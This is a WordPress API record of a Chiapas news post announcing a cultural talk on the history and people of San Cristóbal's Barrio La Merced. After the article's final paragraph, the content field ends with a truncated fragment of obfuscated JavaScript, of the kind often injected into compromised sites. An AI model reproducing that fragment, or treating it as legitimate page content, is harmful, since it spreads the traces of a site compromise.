{"id":17907,"date":"2024-09-18T01:09:36","date_gmt":"2024-09-18T01:09:36","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=17907"},"modified":"2024-09-18T01:09:36","modified_gmt":"2024-09-18T01:09:36","slug":"conversatorio-cultura-mercedaria-destaca-la-historia-y-personajes-del-barrio-la-merced","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=17907","title":{"rendered":"Conversatorio &#8220;Cultura Mercedaria&#8221; destaca la historia y personajes del Barrio La Merced"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"939\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/IMG-20240917-WA0021-939x1024.jpg\" alt=\"\" class=\"wp-image-17908\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/IMG-20240917-WA0021-939x1024.jpg 939w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/IMG-20240917-WA0021-275x300.jpg 275w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/IMG-20240917-WA0021-768x838.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/IMG-20240917-WA0021.jpg 1100w\" sizes=\"auto, (max-width: 939px) 100vw, 939px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<\/p>\n\n\n\n<p>17 de septiembre del 2024. San Crist\u00f3bal de Las Casas.- En el marco de las festividades en honor a La Virgen de La Merced, la comunidad mercedaria se prepara para una nueva edici\u00f3n del &#8220;Conversatorio Cultura Mercedaria: Un Reconocimiento a la historia, las tradiciones y los personajes de nuestro Barrio&#8221;. Esta ser\u00e1 la segunda ocasi\u00f3n en que se realiza, lo cual busca resaltar el legado cultural e hist\u00f3rico de la zona.<\/p>\n\n\n\n<p>Miguel \u00c1ngel Mu\u00f1oz Luna coment\u00f3 que el conversatorio se llevar\u00e1 a cabo el viernes 20 de septiembre a las 7:00 p.m. en el emblem\u00e1tico Templo de La Merced. Durante la velada, se presentar\u00e1n acervos fotogr\u00e1ficos in\u00e9ditos que capturan la esencia del barrio a lo largo de los a\u00f1os, as\u00ed como dos pinturas al \u00f3leo del Siglo XIX, representaciones de La Virgen de La Merced, nunca antes vistas por el p\u00fablico.<\/p>\n\n\n\n<p>Adem\u00e1s, se rendir\u00e1 homenaje a varios mercedarios cuya trayectoria y dedicaci\u00f3n han sido fundamentales para la preservaci\u00f3n de las fiestas en honor a la Virgen, las cuales se han convertido en una tradici\u00f3n arraigada en la comunidad.<\/p>\n\n\n\n<p>El evento tambi\u00e9n ser\u00e1 transmitido en vivo a trav\u00e9s de la p\u00e1gina de Facebook DonDiegoDeMaz y Revista SanCris, para quienes no puedan asistir de manera presencial.<\/p>\n\n\n\n<p>La invitaci\u00f3n est\u00e1 abierta a todos aquellos que deseen sumarse a esta celebraci\u00f3n cultural que busca fortalecer el sentido de identidad y pertenencia en torno a la Virgen de La Merced y su barrio.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal 17 de septiembre del 2024. San Crist\u00f3bal de Las Casas.- En el marco de las festividades en honor a La Virgen de La Merced, la comunidad mercedaria se prepara para una nueva edici\u00f3n del &#8220;Conversatorio Cultura Mercedaria: Un Reconocimiento a la historia, las tradiciones y los personajes de nuestro Barrio&#8221;. Esta ser\u00e1 &hellip;<\/p>\n","protected":false},"author":2,"featured_media":17908,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-17907","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17907","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=17907"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17907\/revisions"}],"predecessor-version":[{"id":17909,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17907\/revisions\/17909"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/17908"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=17907"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=17907"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=17907"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}